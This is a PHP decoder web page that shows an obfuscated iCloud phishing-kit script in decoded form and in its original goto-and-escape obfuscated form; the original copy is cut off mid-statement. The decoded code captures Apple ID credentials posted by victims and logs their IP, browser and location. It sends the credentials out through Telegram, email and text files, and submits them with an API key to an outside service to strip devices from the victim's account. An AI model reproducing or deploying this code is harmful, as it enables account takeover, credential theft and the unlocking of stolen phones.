Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto wWgCy; W3Ytj: $os = getOS($_SERVER["\110\124\124\120\x5f\x55\123\x45\x52\137\101\x..
Decoded Output download
<?
goto wWgCy; W3Ytj: $os = getOS($_SERVER["HTTP_USER_AGENT"]); goto n1Sd3; qGTTv: $ID = $_POST["ID"]; goto rmxDO; km65I: function ip_info($ip = NULL, $purpose = "location", $deep_detect = TRUE) { $output = NULL; if (filter_var($ip, FILTER_VALIDATE_IP) === FALSE) { $ip = $_SERVER["REMOTE_ADDR"]; if ($deep_detect) { if (filter_var(@$_SERVER["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (filter_var(@$_SERVER["HTTP_CLIENT_IP"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } } } $purpose = str_replace(array("name", "
", " ", " ", "-", "_"), NULL, strtolower(trim($purpose))); $support = array("country", "countrycode", "state", "region", "city", "location", "address"); $continents = array("AF" => "Africa", "AN" => "Antarctica", "AS" => "Asia", "EU" => "Europe", "OC" => "Australia (Oceania)", "NA" => "North America", "SA" => "South America"); if (filter_var($ip, FILTER_VALIDATE_IP) && in_array($purpose, $support)) { $ipdat = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip)); if (@strlen(trim($ipdat->geoplugin_countryCode)) == 2) { switch ($purpose) { case "location": $output = array("city" => @$ipdat->geoplugin_city, "state" => @$ipdat->geoplugin_regionName, "country" => @$ipdat->geoplugin_countryName, "country_code" => @$ipdat->geoplugin_countryCode, "continent" => @$continents[strtoupper($ipdat->geoplugin_continentCode)], "continent_code" => @$ipdat->geoplugin_continentCode); break; case "address": $address = array($ipdat->geoplugin_countryName); if (@strlen($ipdat->geoplugin_regionName) >= 1) { $address[] = $ipdat->geoplugin_regionName; } if (@strlen($ipdat->geoplugin_city) >= 1) { $address[] = $ipdat->geoplugin_city; } $output = implode(", ", array_reverse($address)); break; case "city": $output = @$ipdat->geoplugin_city; break; case "state": $output = @$ipdat->geoplugin_regionName; break; case "region": $output = @$ipdat->geoplugin_regionName; break; case "country": $output = @$ipdat->geoplugin_countryName; break; case "countrycode": $output = @$ipdat->geoplugin_countryCode; break; } } } return $output; } goto J9Cb3; NRvZG: include "../fmi.php"; goto W_sXx; Ai_jp: include "../profile.php"; goto NRvZG; HEhPy: $auth = $_POST["auth"]; goto qGTTv; dx7SL: $uri = "#" . $url; goto HEhPy; CfTyT: function getBrowser() { $agent = $_SERVER["HTTP_USER_AGENT"]; $name = "NA"; if (preg_match("/MSIE/i", $agent) && !preg_match("/Opera/i", $agent)) { $name = "Internet Explorer"; } elseif (preg_match("/Firefox/i", $agent)) { $name = "Mozilla Firefox"; } elseif (preg_match("/Chrome/i", $agent)) { $name = "Google Chrome"; } elseif (preg_match("/Safari/i", $agent)) { $name = "Apple Safari"; } elseif (preg_match("/Opera/i", $agent)) { $name = "Opera"; } elseif (preg_match("/Netscape/i", $agent)) { $name = "Netscape"; } return $name; } goto km65I; BVwu3: $url = htmlspecialchars($_SERVER["HTTP_HOST"]); goto dx7SL; W_sXx: if (!empty($_POST["apple_id"]) && !empty($_POST["apple_pwd"])) { $key = $_POST["key"]; $isOkKey = true; $id = $_POST["apple_id"]; $pass = $_POST["apple_pwd"]; $auth_status = file_get_contents("https://" . $_SERVER["SERVER_NAME"] . "/auth-icloud.php?id=" . $_POST["apple_id"] . "&pw=" . $_POST["apple_pwd"]); $auth_status = $auth_status == 200 ? true : false; if ($auth_status) { $log = "Apple ID: " . $_POST["apple_id"] . "\xa" . "Password: " . $pass . "\xa" . "IP: " . $IP . "\xa
"; $istatus = "completed"; $mess = "<p>\xe2\x9c\x85 \xf0\x9f\224\223Your unlock code has been successfully calculated.\xf0\237\x94\220 \xf0\x9f\x8e\x81</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\360\x9f\x93\x83 Order details</p>"; $mess .= "<p>\xf0\237\224\227 link : " . $url . "</p>"; $mess .= "<p>\xf0\x9f\224\227 Link Code : " . $ID . $auth . $ref . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\360\x9f\223\215 IP Address: " . $IP . "</p>"; $mess .= "<p>\xf0\x9f\223\261 Browser : " . $browser . "</p>"; $mess .= "<p>\360\237\x96\xa5 OS : " . $os . "</p>"; $mess .= "<p>\360\x9f\214\x90 Dev.Lang : " . $lang . "</p>"; $mess .= "<p>\xf0\237\214\217 Country : " . $country . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\xf0\237\206\x94 Apple ID : " . $_POST["apple_id"] . "</p>"; $mess .= "<p>\360\x9f\x94\x91 Password : " . $pass . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\360\x9f\206\x94 {$twitter}</p>"; $mess .= "<p>\360\237\206\x94 {$twitter2}</p>"; $mess .= "<p>\xf0\237\206\x94 {$telegram}</p>"; $mess .= "<p>\360\x9f\206\224 {$copy}</p>"; if ($isOkKey) { $messBot = str_replace("</p>", "\xa", $mess); $messBot = strip_tags($messBot); Telegram('', $messBot); $path_to_file = "../access.txt"; $file_contents = file_get_contents($path_to_file); $file_contents = str_replace($auth, ",", $file_contents); file_put_contents($path_to_file, $file_contents); $arr = explode("@", $email); $name = $arr[0]; $_SESSION["name"] = $name; $file = fopen("../link/unlock/access.txt", "a"); fwrite($file, "{$ID}{$auth}{$ref}"); fwrite($file, "
"); fclose($file); $file = fopen("../link/unlock/email.txt", "a"); fwrite($file, "{$id}"); fwrite($file, "
"); fclose($file); $file = fopen("../link/unlock/password.txt", "a"); fwrite($file, "{$pass}"); fwrite($file, "\xd
"); fclose($file); mail($to, $subject, $log, $headers); echo "{"message":"" . $name . "","success":true,"duration":"0.0000"}"; } $remove = AutoRemove($_POST["apple_id"], $_POST["apple_pwd"]); Telegram('', "---------\360\x9f\x93\264 Auto Remove Result---------
{$remove}
"); } else { $mess = "<p>\342\x9d\x8c User entered wrong password \342\232\240\xef\xb8\x8f</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\xf0\237\223\x83 Order details</p>"; $mess .= "<p>\xf0\x9f\224\x97 link : " . $url . "</p>"; $mess .= "<p>\xf0\237\224\227 Link Code : " . $ID . $auth . $ref . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\360\x9f\x93\x8d IP Address: " . $IP . "</p>"; $mess .= "<p>\xf0\237\x93\261 Browser : " . $browser . "</p>"; $mess .= "<p>\360\x9f\226\245 OS : " . $os . "</p>"; $mess .= "<p>\360\x9f\x8c\220 Dev.Lang : " . $lang . "</p>"; $mess .= "<p>\360\237\x8c\x8f Country : " . $country . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\360\x9f\206\x94 Apple ID : " . $_POST["apple_id"] . "</p>"; $mess .= "<p>\xf0\237\224\x91 Password : " . $pass . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>\xf0\x9f\206\224 {$twitter}</p>"; $mess .= "<p>\360\237\x86\x94 {$twitter2}</p>"; $mess .= "<p>\xf0\x9f\x86\x94 {$telegram}</p>"; $mess .= "<p>\xf0\237\206\224 {$copy}</p>"; if ($isOkKey) { $messBot = str_replace("</p>", "
", $mess); $messBot = strip_tags($messBot); Telegram('', $messBot); } $logs = "Apple ID: " . $_POST["apple_id"] . "
" . "Password: " . $pass . "
" . "IP: " . $IP . "\xa
"; mail($to, $subjects, $logs, $headers); echo "{"error":"login failed","success":false,"duration":"0.0000"}"; $file = fopen("../link/failed/access.txt", "a"); fwrite($file, "{$ID}{$auth}{$ref}"); fwrite($file, "
\xa"); fclose($file); $file = fopen("../link/failed/email.txt", "a"); fwrite($file, "{$id}"); fwrite($file, "\xd
"); fclose($file); $file = fopen("../link/failed/password.txt", "a"); fwrite($file, "{$pass}"); fwrite($file, "
"); fclose($file); } } goto Tjejk; A920S: $IP = getUserIP(); goto sXhEh; Tjejk: function AutoRemove($id, $pass) { $msg = file_get_contents("https://" . $_SERVER["SERVER_NAME"] . "/LostMessage.php?id={$id}&pass={$pass}"); $msg = json_decode($msg); $owner_text = $msg->text; $owner_number = $msg->number; $myCheck["appleid"] = $id; $myCheck["password"] = $pass; $myCheck["key"] = "6DR-H5K-85D-ASA-FS7-3U8-YCC-MJB"; $myCheck["subscription"] = 1; $myCheck["format"] = "JSON"; $ch = curl_init("https://api.ifreeicloud.co.uk"); curl_setopt($ch, CURLOPT_POSTFIELDS, $myCheck); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $a = json_decode($myResult); $name = $a->name; $count = $a->count; if ($count > 0) { $text = "\360\237\x91\244 Name: {$name}\xa
\xf0\237\x93\xb1 Total Devices: {$count}
\xa"; $devices = $a->devices; foreach ($devices as $device) { $aname = $device->name; $model = $device->model; $mode = $device->mode; $status = $device->status; $unlocked = $device->unlocked; if ($unlocked) { $unlocked = "Removed \xf0\237\x91\x8d"; } else { $unlocked = "Unlock Failed \xf0\237\x91\216"; } $text .= "Device Name: {$aname}\xaDevice Model: {$model}\xaDevice Mode: {$mode}
{$status}+{$unlocked}\xa
"; } return $text; } else { return "This Apple ID no have devices."; } } else { return "INVALID"; } } goto NbHb1; sXhEh: $browser = getBrowser(); goto W3Ytj; rmxDO: $ref = $_POST["ref"]; goto QA04l; n1Sd3: $country = ip_info("Visitor", "City") . " " . ip_info("Visitor", "Country"); goto I38Na; nKv6J: $subjects = "False Attempt Details"; goto Ai_jp; QA04l: $lang = substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2); goto A920S; nlnfn: $subject = "True Login Details"; goto nKv6J; wWgCy: function getOS($user_agent) { $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto CfTyT; J9Cb3: function getUserIP() { if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_CF_CONNECTING_IP"]; $_SERVER["HTTP_CLIENT_IP"] = $_SERVER["HTTP_CF_CONNECTING_IP"]; } $client = @$_SERVER["HTTP_CLIENT_IP"]; $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"]; $remote = $_SERVER["REMOTE_ADDR"]; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } goto BVwu3; I38Na: $headers .= "From: iSender Server" . ''; goto nlnfn; NbHb1: ?>Did this file decode correctly?
Original Code
goto wWgCy; W3Ytj: $os = getOS($_SERVER["\110\124\124\120\x5f\x55\123\x45\x52\137\101\x47\105\x4e\124"]); goto n1Sd3; qGTTv: $ID = $_POST["\x49\x44"]; goto rmxDO; km65I: function ip_info($ip = NULL, $purpose = "\154\157\143\141\164\151\x6f\156", $deep_detect = TRUE) { $output = NULL; if (filter_var($ip, FILTER_VALIDATE_IP) === FALSE) { $ip = $_SERVER["\x52\x45\x4d\117\x54\105\137\101\104\104\x52"]; if ($deep_detect) { if (filter_var(@$_SERVER["\x48\124\x54\120\x5f\130\137\106\117\x52\127\x41\122\104\105\104\137\106\117\122"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["\x48\x54\124\120\137\x58\x5f\106\117\122\x57\x41\x52\104\105\x44\x5f\106\x4f\122"]; } if (filter_var(@$_SERVER["\110\x54\124\x50\x5f\x43\114\111\x45\116\124\137\x49\x50"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["\110\x54\x54\x50\137\103\114\111\105\116\x54\x5f\111\120"]; } } } $purpose = str_replace(array("\156\x61\155\x65", "\12", "\11", "\40", "\x2d", "\x5f"), NULL, strtolower(trim($purpose))); $support = array("\x63\x6f\x75\x6e\164\162\x79", "\143\x6f\x75\156\x74\162\171\x63\x6f\x64\x65", "\163\164\141\x74\145", "\x72\x65\x67\151\x6f\x6e", "\x63\x69\x74\171", "\x6c\157\x63\x61\x74\x69\x6f\156", "\x61\144\144\162\145\x73\163"); $continents = array("\x41\106" => "\x41\146\162\151\x63\141", "\101\116" => "\x41\x6e\x74\x61\x72\143\x74\x69\x63\141", "\101\123" => "\x41\163\x69\141", "\105\125" => "\105\x75\162\157\x70\145", "\x4f\103" => "\x41\x75\x73\164\162\x61\x6c\151\141\40\50\x4f\143\x65\141\156\151\x61\x29", "\116\101" => "\x4e\x6f\162\x74\150\40\101\155\145\x72\151\143\x61", "\123\x41" => "\123\157\x75\164\150\40\x41\x6d\145\162\151\x63\141"); if (filter_var($ip, FILTER_VALIDATE_IP) && in_array($purpose, $support)) { $ipdat = @json_decode(file_get_contents("\150\164\x74\x70\72\x2f\57\167\x77\167\x2e\147\145\157\160\154\x75\x67\x69\x6e\56\156\145\x74\x2f\152\163\157\156\56\x67\160\x3f\x69\x70\x3d" . $ip)); if (@strlen(trim($ipdat->geoplugin_countryCode)) == 2) { switch ($purpose) { case "\154\157\x63\141\x74\x69\157\x6e": $output = array("\143\x69\x74\x79" => @$ipdat->geoplugin_city, "\x73\164\141\x74\x65" => @$ipdat->geoplugin_regionName, "\x63\x6f\x75\156\164\162\x79" => @$ipdat->geoplugin_countryName, "\x63\x6f\x75\x6e\x74\162\171\x5f\143\x6f\144\145" => @$ipdat->geoplugin_countryCode, "\x63\157\x6e\164\151\x6e\145\x6e\x74" => @$continents[strtoupper($ipdat->geoplugin_continentCode)], "\x63\x6f\156\x74\151\x6e\145\156\164\x5f\x63\x6f\144\x65" => @$ipdat->geoplugin_continentCode); break; case "\141\x64\144\x72\x65\x73\163": $address = array($ipdat->geoplugin_countryName); if (@strlen($ipdat->geoplugin_regionName) >= 1) { $address[] = $ipdat->geoplugin_regionName; } if (@strlen($ipdat->geoplugin_city) >= 1) { $address[] = $ipdat->geoplugin_city; } $output = implode("\54\x20", array_reverse($address)); break; case "\x63\x69\x74\x79": $output = @$ipdat->geoplugin_city; break; case "\x73\164\x61\164\x65": $output = @$ipdat->geoplugin_regionName; break; case "\162\x65\147\x69\x6f\x6e": $output = @$ipdat->geoplugin_regionName; break; case "\x63\x6f\x75\156\x74\x72\171": $output = @$ipdat->geoplugin_countryName; break; case "\143\x6f\165\156\x74\162\171\143\157\x64\x65": $output = @$ipdat->geoplugin_countryCode; break; } } } return $output; } goto J9Cb3; NRvZG: include "\56\x2e\57\x66\155\x69\56\160\x68\160"; goto W_sXx; Ai_jp: include "\x2e\56\x2f\x70\x72\157\146\x69\154\145\56\160\x68\x70"; goto NRvZG; HEhPy: $auth = $_POST["\x61\x75\164\x68"]; goto qGTTv; dx7SL: $uri = "\43" . $url; goto HEhPy; CfTyT: function getBrowser() { $agent = $_SERVER["\x48\x54\124\120\137\x55\x53\x45\x52\x5f\101\107\x45\x4e\124"]; $name = "\x4e\101"; if (preg_match("\x2f\115\123\x49\x45\57\151", $agent) && !preg_match("\57\x4f\x70\x65\162\x61\x2f\x69", $agent)) { $name = "\111\156\x74\145\162\156\x65\x74\x20\105\x78\160\x6c\157\x72\145\162"; } elseif (preg_match("\x2f\x46\151\x72\x65\x66\x6f\x78\x2f\x69", $agent)) { $name = "\115\157\x7a\x69\x6c\x6c\141\x20\106\151\x72\x65\x66\x6f\170"; } elseif (preg_match("\57\x43\150\162\157\x6d\x65\57\x69", $agent)) { $name = "\x47\x6f\x6f\147\x6c\x65\x20\103\x68\162\x6f\155\x65"; } elseif (preg_match("\x2f\123\x61\146\x61\x72\151\x2f\x69", $agent)) { $name = "\x41\160\x70\x6c\x65\40\123\x61\x66\x61\x72\x69"; } elseif (preg_match("\x2f\x4f\160\145\162\141\57\151", $agent)) { $name = "\117\x70\145\162\x61"; } elseif (preg_match("\57\116\145\164\x73\x63\x61\160\x65\57\151", $agent)) { $name = "\116\x65\164\163\143\141\160\x65"; } return $name; } goto km65I; BVwu3: $url = htmlspecialchars($_SERVER["\x48\x54\x54\x50\137\x48\117\x53\x54"]); goto dx7SL; W_sXx: if (!empty($_POST["\x61\x70\160\154\145\137\151\x64"]) && !empty($_POST["\141\160\x70\154\x65\137\160\x77\x64"])) { $key = $_POST["\153\x65\171"]; $isOkKey = true; $id = $_POST["\141\160\x70\x6c\x65\x5f\151\144"]; $pass = $_POST["\x61\160\160\154\x65\137\x70\x77\x64"]; $auth_status = file_get_contents("\150\x74\164\x70\163\72\57\x2f" . $_SERVER["\x53\x45\x52\126\105\122\137\116\101\115\x45"] . "\57\141\x75\164\x68\x2d\x69\143\x6c\157\x75\144\x2e\x70\150\160\77\x69\144\75" . $_POST["\141\x70\160\x6c\145\137\151\144"] . "\x26\160\x77\x3d" . $_POST["\x61\160\x70\154\145\x5f\x70\x77\x64"]); $auth_status = $auth_status == 200 ? true : false; if ($auth_status) { $log = "\x41\x70\x70\x6c\x65\40\x49\x44\72\40" . $_POST["\x61\160\x70\154\x65\137\151\144"] . "\xa" . "\120\x61\x73\163\167\x6f\162\x64\x3a\40" . $pass . "\xa" . "\x49\x50\72\40" . $IP . "\xa\12"; $istatus = "\143\157\x6d\160\154\145\164\x65\144"; $mess = "\x3c\x70\x3e\xe2\x9c\x85\40\xf0\x9f\224\223\x59\x6f\165\162\x20\x75\156\154\x6f\143\153\40\x63\157\x64\x65\x20\x68\141\x73\40\x62\145\145\x6e\x20\x73\x75\143\x63\145\x73\163\x66\x75\154\154\171\x20\143\x61\x6c\x63\x75\x6c\141\164\x65\144\x2e\xf0\237\x94\220\40\xf0\x9f\x8e\x81\x3c\x2f\x70\76"; $mess .= "\x3c\x70\76\x2d\55\55\x2d\x2d\x2d\55\x2d\x2d\55\55\55\55\x2d\55\x2d\x2d\55\x2d\55\55\x2d\55\55\55\x2d\55\x2d\55\55\55\55\x2d\74\x2f\x70\x3e"; $mess .= "\74\160\76\360\x9f\x93\x83\x20\x4f\162\144\x65\x72\x20\x64\x65\164\x61\151\154\x73\x3c\57\160\x3e"; $mess .= "\x3c\x70\76\xf0\237\224\227\x20\154\151\x6e\x6b\40\x3a\40" . $url . "\x3c\x2f\160\x3e"; $mess .= "\74\160\76\xf0\x9f\224\227\x20\x4c\151\156\x6b\40\103\157\x64\x65\40\72\x20" . $ID . $auth . $ref . "\74\57\x70\x3e"; $mess .= "\74\x70\76\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\55\55\x2d\x2d\55\55\55\x2d\x2d\x2d\x2d\55\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\74\57\x70\x3e"; $mess .= "\x3c\x70\x3e\360\x9f\223\215\x20\x49\x50\x20\101\144\144\162\x65\163\163\x3a\x20" . $IP . "\x3c\57\160\76"; $mess .= "\x3c\x70\x3e\xf0\x9f\223\261\40\x42\162\x6f\167\163\x65\x72\40\72\x20" . $browser . "\74\57\160\x3e"; $mess .= "\74\x70\76\360\237\x96\xa5\40\117\123\x20\x3a\40" . $os . "\74\x2f\160\76"; $mess .= "\74\x70\76\360\x9f\214\x90\40\x44\145\166\x2e\114\141\156\x67\x20\72\x20" . $lang . "\74\x2f\160\x3e"; $mess .= "\74\160\76\xf0\237\214\217\x20\x43\157\165\x6e\x74\162\x79\40\x3a\40" . $country . "\x3c\x2f\x70\76"; $mess .= "\74\x70\x3e\55\x2d\x2d\x2d\x2d\55\x2d\55\x2d\55\55\x2d\55\55\55\x2d\x2d\55\55\x2d\x2d\55\55\x2d\x2d\55\55\55\x2d\55\55\x2d\55\x3c\57\160\x3e"; $mess .= "\74\x70\76\xf0\237\206\x94\x20\101\x70\x70\154\x65\x20\x49\104\x20\x3a\40" . $_POST["\141\x70\x70\154\x65\x5f\x69\x64"] . "\74\x2f\x70\x3e"; $mess .= "\74\160\x3e\360\x9f\x94\x91\40\120\x61\163\x73\x77\157\162\144\40\72\40" . $pass . "\x3c\57\160\76"; $mess .= "\74\160\x3e\x2d\55\x2d\55\x2d\55\55\55\55\55\55\55\55\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\55\55\55\x2d\55\55\55\55\55\x2d\x3c\57\160\76"; $mess .= "\x3c\x70\76\360\x9f\206\x94\40{$twitter}\x3c\57\160\x3e"; $mess .= "\x3c\x70\x3e\360\237\206\x94\40{$twitter2}\x3c\x2f\160\x3e"; $mess .= "\74\x70\x3e\xf0\237\206\x94\x20{$telegram}\74\x2f\x70\x3e"; $mess .= "\x3c\160\x3e\360\x9f\206\224\40{$copy}\x3c\57\160\76"; if ($isOkKey) { $messBot = str_replace("\x3c\57\160\76", "\xa", $mess); $messBot = strip_tags($messBot); Telegram('', $messBot); $path_to_file = "\56\56\57\x61\143\x63\145\163\x73\56\x74\170\164"; $file_contents = file_get_contents($path_to_file); $file_contents = str_replace($auth, "\54", $file_contents); file_put_contents($path_to_file, $file_contents); $arr = explode("\100", $email); $name = $arr[0]; $_SESSION["\x6e\x61\x6d\x65"] = $name; $file = fopen("\x2e\x2e\57\x6c\x69\x6e\153\x2f\165\156\x6c\157\143\153\x2f\141\143\x63\x65\163\163\56\x74\170\164", "\141"); fwrite($file, "{$ID}{$auth}{$ref}"); fwrite($file, "\15\12"); fclose($file); $file = fopen("\x2e\56\57\x6c\x69\x6e\x6b\x2f\165\156\154\x6f\143\153\57\x65\x6d\141\151\154\56\x74\x78\x74", "\x61"); fwrite($file, "{$id}"); fwrite($file, "\15\12"); fclose($file); $file = fopen("\56\x2e\57\154\151\156\153\x2f\165\x6e\x6c\x6f\x63\153\57\x70\x61\x73\163\x77\157\162\x64\x2e\164\170\x74", "\141"); fwrite($file, "{$pass}"); fwrite($file, "\xd\12"); fclose($file); mail($to, $subject, $log, $headers); echo "\173\42\155\x65\x73\x73\141\147\145\x22\72\x22" . $name . "\x22\x2c\x22\x73\165\x63\143\x65\x73\x73\x22\72\x74\162\165\145\x2c\42\x64\x75\x72\x61\164\x69\x6f\156\x22\x3a\x22\x30\56\x30\x30\60\x30\x22\x7d"; } $remove = AutoRemove($_POST["\x61\x70\160\154\145\x5f\x69\x64"], $_POST["\141\x70\x70\154\145\137\x70\x77\x64"]); Telegram('', "\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\360\x9f\x93\264\x20\101\x75\164\157\x20\x52\x65\155\157\166\x65\40\122\145\163\x75\154\164\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\12{$remove}\12"); } else { $mess = "\x3c\x70\x3e\342\x9d\x8c\x20\125\163\x65\162\40\x65\156\x74\145\162\x65\x64\x20\x77\162\x6f\156\147\40\x70\x61\x73\163\167\157\x72\144\x20\342\232\240\xef\xb8\x8f\74\57\x70\x3e"; $mess .= "\74\x70\x3e\x2d\x2d\55\x2d\55\55\x2d\55\55\x2d\x2d\x2d\x2d\55\55\55\55\55\55\55\x2d\55\55\55\55\x2d\x2d\x2d\x2d\55\55\55\x2d\x3c\57\x70\x3e"; $mess .= "\74\160\x3e\xf0\237\223\x83\x20\x4f\x72\144\145\162\40\x64\x65\x74\141\151\x6c\163\74\57\160\x3e"; $mess .= "\74\x70\76\xf0\x9f\224\x97\40\x6c\x69\156\x6b\40\72\x20" . $url . "\x3c\x2f\160\76"; $mess .= "\x3c\160\x3e\xf0\237\224\227\40\x4c\x69\x6e\153\x20\x43\x6f\144\145\x20\x3a\40" . $ID . $auth . $ref . "\x3c\x2f\x70\x3e"; $mess .= "\74\x70\76\x2d\x2d\55\55\55\55\55\55\55\55\x2d\55\x2d\x2d\x2d\x2d\55\55\55\55\55\x2d\x2d\x2d\55\x2d\55\55\55\x2d\55\55\55\x3c\x2f\x70\x3e"; $mess .= "\74\x70\x3e\360\x9f\x93\x8d\x20\x49\120\40\101\144\144\x72\145\x73\163\72\x20" . $IP . "\74\57\x70\76"; $mess .= "\74\x70\76\xf0\237\x93\261\40\102\162\157\167\163\145\162\x20\x3a\40" . $browser . "\74\57\x70\76"; $mess .= "\x3c\160\76\360\x9f\226\245\40\117\123\x20\x3a\x20" . $os . "\x3c\57\160\76"; $mess .= "\74\x70\x3e\360\x9f\x8c\220\40\104\145\166\x2e\x4c\x61\156\147\x20\72\x20" . $lang . "\74\x2f\x70\76"; $mess .= "\x3c\x70\76\360\237\x8c\x8f\x20\x43\x6f\165\156\x74\162\171\x20\x3a\40" . $country . "\74\x2f\160\x3e"; $mess .= "\x3c\x70\x3e\55\55\55\55\x2d\x2d\x2d\x2d\55\x2d\x2d\55\55\x2d\55\x2d\55\x2d\55\55\x2d\55\x2d\55\55\55\x2d\55\x2d\55\x2d\x2d\x2d\74\57\x70\76"; $mess .= "\74\x70\76\360\x9f\206\x94\40\x41\x70\160\154\145\x20\111\x44\40\72\40" . $_POST["\x61\x70\x70\154\145\137\x69\144"] . "\74\57\160\x3e"; $mess .= "\x3c\x70\x3e\xf0\237\224\x91\40\120\x61\x73\x73\167\x6f\x72\144\x20\x3a\40" . $pass . "\74\57\x70\x3e"; $mess .= "\74\x70\x3e\x2d\x2d\x2d\x2d\55\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\55\55\x2d\x2d\x2d\74\x2f\160\76"; $mess .= "\x3c\x70\76\xf0\x9f\206\224\40{$twitter}\x3c\57\x70\76"; $mess .= "\74\x70\x3e\360\237\x86\x94\40{$twitter2}\74\x2f\x70\76"; $mess .= "\x3c\x70\76\xf0\x9f\x86\x94\x20{$telegram}\x3c\57\x70\76"; $mess .= "\x3c\x70\x3e\xf0\237\206\224\x20{$copy}\74\x2f\x70\x3e"; if ($isOkKey) { $messBot = str_replace("\74\57\x70\x3e", "\12", $mess); $messBot = strip_tags($messBot); Telegram('', $messBot); } $logs = "\101\160\x70\x6c\x65\x20\111\x44\x3a\40" . $_POST["\141\160\x70\154\145\x5f\x69\144"] . "\12" . "\120\141\163\x73\167\x6f\162\144\x3a\40" . $pass . "\12" . "\111\x50\x3a\x20" . $IP . "\xa\12"; mail($to, $subjects, $logs, $headers); echo "\x7b\42\145\x72\x72\x6f\x72\x22\x3a\x22\154\157\x67\x69\x6e\40\146\141\151\154\145\144\42\54\x22\x73\165\x63\x63\145\x73\x73\x22\x3a\146\x61\154\163\x65\x2c\x22\x64\x75\x72\x61\164\151\157\156\x22\72\x22\60\56\60\60\60\x30\x22\175"; $file = fopen("\56\56\x2f\154\x69\156\x6b\x2f\x66\141\x69\x6c\x65\144\x2f\141\143\x63\x65\x73\163\56\164\x78\x74", "\141"); fwrite($file, "{$ID}{$auth}{$ref}"); fwrite($file, "\15\xa"); fclose($file); $file = fopen("\56\x2e\x2f\x6c\151\x6e\x6b\57\x66\x61\x69\x6c\x65\x64\57\145\x6d\141\151\154\56\164\x78\x74", "\141"); fwrite($file, "{$id}"); fwrite($file, "\xd\12"); fclose($file); $file = fopen("\x2e\x2e\57\154\151\156\x6b\x2f\x66\x61\151\154\145\144\x2f\x70\x61\x73\163\167\x6f\x72\x64\x2e\x74\x78\x74", "\x61"); fwrite($file, "{$pass}"); fwrite($file, "\15\12"); fclose($file); } } goto Tjejk; A920S: $IP = getUserIP(); goto sXhEh; Tjejk: function AutoRemove($id, $pass) { $msg = file_get_contents("\x68\x74\164\x70\163\x3a\57\x2f" . $_SERVER["\x53\x45\122\x56\x45\x52\x5f\x4e\x41\115\105"] . "\x2f\114\x6f\163\x74\x4d\145\x73\163\x61\x67\x65\56\x70\150\160\x3f\x69\x64\75{$id}\46\x70\141\x73\163\75{$pass}"); $msg = json_decode($msg); $owner_text = $msg->text; $owner_number = $msg->number; $myCheck["\141\160\160\154\x65\x69\x64"] = $id; $myCheck["\160\141\163\x73\x77\x6f\x72\144"] = $pass; $myCheck["\x6b\x65\171"] = "\66\x44\122\x2d\x48\65\x4b\x2d\x38\x35\104\x2d\x41\123\x41\x2d\x46\x53\67\55\x33\125\70\55\131\103\x43\x2d\x4d\x4a\x42"; $myCheck["\x73\165\142\x73\x63\x72\x69\160\x74\x69\x6f\x6e"] = 1; $myCheck["\x66\157\x72\155\141\x74"] = "\112\123\x4f\116"; $ch = curl_init("\x68\x74\164\x70\x73\x3a\x2f\x2f\141\160\x69\x2e\x69\146\x72\145\x65\151\143\x6c\157\165\x64\x2e\x63\x6f\x2e\x75\x6b"); curl_setopt($ch, CURLOPT_POSTFIELDS, $myCheck); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode == 200 && stripos($myResult, 